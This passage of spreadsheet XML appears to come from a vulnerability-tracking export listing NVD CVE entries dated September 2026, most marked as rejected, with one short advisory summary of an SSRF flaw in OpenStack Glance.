      <c r="Q448" s="5" t="inlineStr"/>
      <c r="R448" s="5" t="inlineStr"/>
      <c r="S448" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T448" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45236</t>
        </is>
      </c>
    </row>
    <row r="449">
      <c r="A449" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B449" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C449" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45237</t>
        </is>
      </c>
      <c r="D449" s="5" t="inlineStr"/>
      <c r="E449" s="5" t="inlineStr"/>
      <c r="F449" s="5" t="inlineStr"/>
      <c r="G449" s="5" t="inlineStr"/>
      <c r="H449" s="5" t="inlineStr"/>
      <c r="I449" s="5" t="inlineStr"/>
      <c r="J449" s="5" t="inlineStr"/>
      <c r="K449" s="5" t="inlineStr"/>
      <c r="L449" s="5" t="inlineStr"/>
      <c r="M449" s="5" t="inlineStr"/>
      <c r="N449" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O449" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P449" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q449" s="5" t="inlineStr"/>
      <c r="R449" s="5" t="inlineStr"/>
      <c r="S449" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T449" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45237</t>
        </is>
      </c>
    </row>
    <row r="450">
      <c r="A450" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B450" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C450" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45238</t>
        </is>
      </c>
      <c r="D450" s="5" t="inlineStr"/>
      <c r="E450" s="5" t="inlineStr"/>
      <c r="F450" s="5" t="inlineStr"/>
      <c r="G450" s="5" t="inlineStr"/>
      <c r="H450" s="5" t="inlineStr"/>
      <c r="I450" s="5" t="inlineStr"/>
      <c r="J450" s="5" t="inlineStr"/>
      <c r="K450" s="5" t="inlineStr"/>
      <c r="L450" s="5" t="inlineStr"/>
      <c r="M450" s="5" t="inlineStr"/>
      <c r="N450" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O450" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P450" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q450" s="5" t="inlineStr"/>
      <c r="R450" s="5" t="inlineStr"/>
      <c r="S450" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T450" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45238</t>
        </is>
      </c>
    </row>
    <row r="451">
      <c r="A451" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B451" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C451" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45239</t>
        </is>
      </c>
      <c r="D451" s="5" t="inlineStr"/>
      <c r="E451" s="5" t="inlineStr"/>
      <c r="F451" s="5" t="inlineStr"/>
      <c r="G451" s="5" t="inlineStr"/>
      <c r="H451" s="5" t="inlineStr"/>
      <c r="I451" s="5" t="inlineStr"/>
      <c r="J451" s="5" t="inlineStr"/>
      <c r="K451" s="5" t="inlineStr"/>
      <c r="L451" s="5" t="inlineStr"/>
      <c r="M451" s="5" t="inlineStr"/>
      <c r="N451" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O451" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P451" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q451" s="5" t="inlineStr"/>
      <c r="R451" s="5" t="inlineStr"/>
      <c r="S451" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T451" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45239</t>
        </is>
      </c>
    </row>
    <row r="452">
      <c r="A452" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B452" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C452" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45240</t>
        </is>
      </c>
      <c r="D452" s="5" t="inlineStr"/>
      <c r="E452" s="5" t="inlineStr"/>
      <c r="F452" s="5" t="inlineStr"/>
      <c r="G452" s="5" t="inlineStr"/>
      <c r="H452" s="5" t="inlineStr"/>
      <c r="I452" s="5" t="inlineStr"/>
      <c r="J452" s="5" t="inlineStr"/>
      <c r="K452" s="5" t="inlineStr"/>
      <c r="L452" s="5" t="inlineStr"/>
      <c r="M452" s="5" t="inlineStr"/>
      <c r="N452" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O452" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P452" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q452" s="5" t="inlineStr"/>
      <c r="R452" s="5" t="inlineStr"/>
      <c r="S452" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T452" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45240</t>
        </is>
      </c>
    </row>
    <row r="453">
      <c r="A453" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B453" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C453" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45241</t>
        </is>
      </c>
      <c r="D453" s="5" t="inlineStr"/>
      <c r="E453" s="5" t="inlineStr"/>
      <c r="F453" s="5" t="inlineStr"/>
      <c r="G453" s="5" t="inlineStr"/>
      <c r="H453" s="5" t="inlineStr"/>
      <c r="I453" s="5" t="inlineStr"/>
      <c r="J453" s="5" t="inlineStr"/>
      <c r="K453" s="5" t="inlineStr"/>
      <c r="L453" s="5" t="inlineStr"/>
      <c r="M453" s="5" t="inlineStr"/>
      <c r="N453" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O453" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P453" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q453" s="5" t="inlineStr"/>
      <c r="R453" s="5" t="inlineStr"/>
      <c r="S453" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T453" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45241</t>
        </is>
      </c>
    </row>
    <row r="454">
      <c r="A454" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B454" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C454" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49117</t>
        </is>
      </c>
      <c r="D454" s="5" t="inlineStr"/>
      <c r="E454" s="5" t="inlineStr"/>
      <c r="F454" s="5" t="inlineStr"/>
      <c r="G454" s="5" t="inlineStr"/>
      <c r="H454" s="5" t="inlineStr"/>
      <c r="I454" s="5" t="inlineStr"/>
      <c r="J454" s="5" t="inlineStr"/>
      <c r="K454" s="5" t="inlineStr"/>
      <c r="L454" s="5" t="inlineStr"/>
      <c r="M454" s="5" t="inlineStr"/>
      <c r="N454" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O454" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P454" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q454" s="5" t="inlineStr"/>
      <c r="R454" s="5" t="inlineStr"/>
      <c r="S454" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T454" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49117</t>
        </is>
      </c>
    </row>
    <row r="455">
      <c r="A455" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B455" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C455" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49118</t>
        </is>
      </c>
      <c r="D455" s="5" t="inlineStr"/>
      <c r="E455" s="5" t="inlineStr"/>
      <c r="F455" s="5" t="inlineStr"/>
      <c r="G455" s="5" t="inlineStr"/>
      <c r="H455" s="5" t="inlineStr"/>
      <c r="I455" s="5" t="inlineStr"/>
      <c r="J455" s="5" t="inlineStr"/>
      <c r="K455" s="5" t="inlineStr"/>
      <c r="L455" s="5" t="inlineStr"/>
      <c r="M455" s="5" t="inlineStr"/>
      <c r="N455" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O455" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P455" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q455" s="5" t="inlineStr"/>
      <c r="R455" s="5" t="inlineStr"/>
      <c r="S455" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T455" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49118</t>
        </is>
      </c>
    </row>
    <row r="456">
      <c r="A456" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B456" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C456" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51772</t>
        </is>
      </c>
      <c r="D456" s="5" t="inlineStr"/>
      <c r="E456" s="5" t="inlineStr"/>
      <c r="F456" s="5" t="inlineStr"/>
      <c r="G456" s="5" t="inlineStr"/>
      <c r="H456" s="5" t="inlineStr"/>
      <c r="I456" s="5" t="inlineStr"/>
      <c r="J456" s="5" t="inlineStr"/>
      <c r="K456" s="5" t="inlineStr"/>
      <c r="L456" s="5" t="inlineStr"/>
      <c r="M456" s="5" t="inlineStr"/>
      <c r="N456" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O456" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P456" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q456" s="5" t="inlineStr"/>
      <c r="R456" s="5" t="inlineStr"/>
      <c r="S456" s="5" t="inlineStr">
        <is>
          <t>A Server-Side Request Forgery (SSRF) vulnerability exists in the Image API (v2) of OpenStack Glance. When the show_multiple_locations configuration option is enabled in glance-api.conf, an authenticated attacker can manipulate the locations attribute of an image in the queued state by sending a crafted HTTP PATCH request</t>
        </is>
      </c>
      <c r="T456" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51772</t>
        </is>
      </c>
    </row>
    <row r="457">
      <c r="A457" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B457" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C457" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53971</t>
        </is>
      </c>
      <c r="D457" s="5" t="inlineStr"/>
      <c r="E457" s="5" t="inlineStr"/>
      <c r="F457" s="5" t="inlineStr"/>
      <c r="G457" s="5" t="inlineStr"/>
      <c r="H457" s="5" t="inlineStr"/>
      <c r="I457" s="5" t="inlineStr"/>
      <c r="J457" s="5" t="inlineStr"/>
      <c r="K457" s="5" t="inlineStr"/>
      <c r="L457" s="5" t="inlineStr"/>
      <c r="M457" s="5" t="inlineStr"/>
      <c r="N457" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O457" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P457" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q457" s="5" t="inlineStr"/>
      <c r="R457" s="5" t="inlineStr"/>
      <c r="S457" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T457" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53971</t>
        </is>
      </c>
    </row>
    <row r="458">
      <c r="A458" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B458" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C458" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53972</t>
        </is>
      </c>
      <c r="D458" s="5" t="inlineStr"/>
      <c r="E458" s="5" t="inlineStr"/>
      <c r="F458" s="5" t="inlineStr"/>
      <c r="G458" s="5" t="inlineStr"/>
      <c r="H458" s="5" t="inlineStr"/>
      <c r="I458" s="5" t="inlineStr"/>
      <c r="J458" s="5" t="inlineStr"/>
      <c r="K458" s="5" t="inlineStr"/>
      <c r="L458" s="5" t="inlineStr"/>
      <c r="M458" s="5" t="inlineStr"/>
      <c r="N458" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O458" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P458" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q458" s="5" t="inlineStr"/>
      <c r="R458" s="5" t="inlineStr"/>
      <c r="S458" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T458" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53972</t>
        </is>
      </c>
    </row>
    <row r="459">
      <c r="A459" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B459" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C459" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53973</t>
        </is>
      </c>
      <c r="D459" s="5" t="inlineStr"/>
      <c r="E459" s="5" t="inlineStr"/>
      <c r="F459" s="5" t="inlineStr"/>
      <c r="G459" s="5" t="inlineStr"/>
      <c r="H459" s="5" t="inlineStr"/>
      <c r="I459" s="5" t="inlineStr"/>
      <c r="J459" s="5" t="inlineStr"/>
      <c r="K459" s="5" t="inlineStr"/>
      <c r="L459" s="5" t="inlineStr"/>
      <c r="M459" s="5" t="inlineStr"/>
      <c r="N459" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O459" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P459" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q459" s="5" t="inlineStr"/>
      <c r="R459" s="5" t="inlineStr"/>
      <c r="S459" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T459" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53973</t>
        </is>
      </c>
    </row>
    <row r="460">
      <c r="A460" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B460" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C460" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53990</t>
        </is>
      </c>
      <c r="D460" s="5" t="inlineStr"/>
      <c r="E460" s="5" t="inlineStr"/>
      <c r="F460" s="5" t="inlineStr"/>
      <c r="G460" s="5" t="inlineStr"/>
      <c r="H460" s="5" t="inlineStr"/>
      <c r="I460" s="5" t="inlineStr"/>
      <c r="J460" s="5" t="inlineStr"/>
      <c r="K460" s="5" t="inlineStr"/>
      <c r="L460" s="5" t="inlineStr"/>
      <c r="M460" s="5" t="inlineStr"/>
      <c r="N460" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O460" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P460" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q460" s="5" t="inlineStr"/>
      <c r="R460" s="5" t="inlineStr"/>
      <c r="S460" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T460" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53990</t>
        </is>
      </c>
    </row>
    <row r="461">
      <c r="A461" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B461" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C461" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57861</t>
        </is>
      </c>
      <c r="D461" s="5" t="inlineStr"/>
      <c r="E461" s="5" t="inlineStr"/>
      <c r="F461" s="5" t="inlineStr"/>
      <c r="G461" s="5" t="inlineStr"/>
      <c r="H461" s="5" t="inlineStr"/>
      <c r="I461" s="5" t="inlineStr"/>
      <c r="J461" s="5" t="inlineStr"/>
      <c r="K461" s="5" t="inlineStr"/>
      <c r="L461" s="5" t="inlineStr"/>
      <c r="M461" s="5" t="inlineStr"/>
      <c r="N461" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O461" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P461" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q461" s="5" t="inlineStr"/>
      <c r="R461" s="5" t="inlineStr"/>
      <c r="S461" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T461" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57861</t>
        </is>
      </c>
    </row>
    <row r="462">
      <c r="A462" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B462" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C462" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57864</t>
        </is>
      </c>
      <c r="D462" s="5" t="inlineStr"/>
      <c r="E462" s="5" t="inlineStr"/>
      <c r="F462" s="5" t="inlineStr"/>
      <c r="G462" s="5" t="inlineStr"/>
      <c r="H462" s="5" t="inlineStr"/>
      <c r="I462" s="5" t="inlineStr"/>
      <c r="J462" s="5" t="inlineStr"/>
      <c r="K462" s="5" t="inlineStr"/>
      <c r="L462" s="5" t="inlineStr"/>
      <c r="M462" s="5" t="inlineStr"/>
      <c r="N462" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O462" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P462" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q462" s="5" t="inlineStr"/>
      <c r="R462" s="5" t="inlineStr"/>
      <c r="S462" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T462" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57864</t>
        </is>
      </c>
    </row>
    <row r="463">
      <c r="A463" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B463" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C463" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-60096</t>
        </is>
      </c>
      <c r="D463" s="5" t="inlineStr"/>
      <c r="E463" s="5" t="inlineStr"/>
      <c r="F463" s="5" t="inlineStr"/>
      <c r="G463" s="5" t="inlineStr"/>
      <c r="H463" s="5" t="inlineStr"/>
      <c r="I463" s="5" t="inlineStr"/>
      <c r="J463" s="5" t="inlineStr"/>
      <c r="K463" s="5" t="inlineStr"/>
      <c r="L463" s="5" t="inlineStr"/>
      <c r="M463" s="5" t="inlineStr"/>
      <c r="N463" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O463" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P463" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q463" s="5" t="inlineStr"/>
      <c r="R463" s="5" t="inlineStr"/>
      <c r="S463" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T463" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-60096</t>
        </is>
      </c>
    </row>
    <row r="464">
      <c r="A464" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B464" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C464" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-60097</t>
        </is>
      </c>
      <c r="D464" s="5" t="inlineStr"/>
      <c r="E464" s="5" t="inlineStr"/>
      <c r="F464" s="5" t="inlineStr"/>
      <c r="G464" s="5" t="inlineStr"/>
      <c r="H464" s="5" t="inlineStr"/>
      <c r="I464" s="5" t="inlineStr"/>
      <c r="J464" s="5" t="inlineStr"/>
      <c r="K464" s="5" t="inlineStr"/>
      <c r="L464" s="5" t="inlineStr"/>
      <c r="M464" s="5" t="inlineStr"/>
      <c r="N464" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O464" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P464" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q464" s="5" t="inlineStr"/>
      <c r="R464" s="5" t="inlineStr"/>
      <c r="S464" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T464" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-60097</t>
        </is>
      </c>
    </row>
    <row r="465">
      <c r="A465" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B465" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C465" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-60098</t>
        </is>
      </c>
      <c r="D465" s="5" t="inlineStr"/>
      <c r="E465" s="5" t="inlineStr"/>
      <c r="F465" s="5" t="inlineStr"/>
      <c r="G465" s="5" t="inlineStr"/>
      <c r="H465" s="5" t="inlineStr"/>
      <c r="I465" s="5" t="inlineStr"/>
      <c r="J465" s="5" t="inlineStr"/>
      <c r="K465" s="5" t="inlineStr"/>
      <c r="L465" s="5" t="inlineStr"/>
      <c r="M465" s="5" t="inlineStr"/>
      <c r="N465" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O465" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P465" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q465" s="5" t="inlineStr"/>
      <c r="R465" s="5" t="inlineStr"/>
      <c r="S465" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T465" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-60098</t>
        </is>
      </c>
    </row>
    <row r="466">
      <c r="A466" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B466" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C466" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-60099</t>
        </is>
      </c>
      <c r="D466" s="5" t="inlineStr"/>
      <c r="E466" s="5" t="inlineStr"/>
      <c r="F466" s="5" t="inlineStr"/>
      <c r="G466" s="5" t="inlineStr"/>
      <c r="H466" s="5" t="inlineStr"/>
      <c r="I466" s="5" t="inlineStr"/>
      <c r="J466" s="5" t="inlineStr"/>
      <c r="K466" s="5" t="inlineStr"/>
      <c r="L466" s="5" t="inlineStr"/>
      <c r="M466" s="5" t="inlineStr"/>
      <c r="N466" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O466" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P466" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q466" s="5" t="inlineStr"/>
      <c r="R466" s="5" t="inlineStr"/>
      <c r="S466" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T466" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-60099</t>
        </is>
      </c>
    </row>
    <row r="467">
      <c r="A467" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B467" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C467" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-60100</t>
        </is>
      </c>
      <c r="D467" s="5" t="inlineStr"/>
      <c r="E467" s="5" t="inlineStr"/>
      <c r="F467" s="5" t="inlineStr"/>
      <c r="G467" s="5" t="inlineStr"/>
      <c r="H467" s="5" t="inlineStr"/>
      <c r="I467" s="5" t="inlineStr"/>
      <c r="J467" s="5" t="inlineStr"/>
      <c r="K467" s="5" t="inlineStr"/>
      <c r="L467" s="5" t="inlineStr"/>
      <c r="M467" s="5" t="inlineStr"/>
      <c r="N467" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O467" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P467" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q467" s="5" t="inlineStr"/>
      <c r="R467" s="5" t="inlineStr"/>
      <c r="S467" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="T467" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-60100</t>
        </is>
      </c>
    </row>
    <row r="468">
      <c r="A468" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B468" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C468" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-60101</t>
        </is>
      </c>
      <c r="D468" s="5" t="inlineStr"/>
      <c r="E468" s="5" t="inlineStr"/>
      <c r="F468" s="5" t="inlineStr"/>
      <c r="G468" s="5" t="inlineStr"/>
      <c r="H468" s="5" t="inlineStr"/>
      <c r="I468" s="5" t="inlineStr"/>
      <c r="J468" s="5" t="inlineStr"/>
      <c r="K468" s="5" t="inlineStr"/>
      <c r="L468" s="5" t="inlineStr"/>
      <c r="M468" s="5" t="inlineStr"/>
      <c r="N468" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O468" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P468" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q468" s="5" t="inlineStr"/>
      <c r="R468" s="5" t="inlineStr"/>
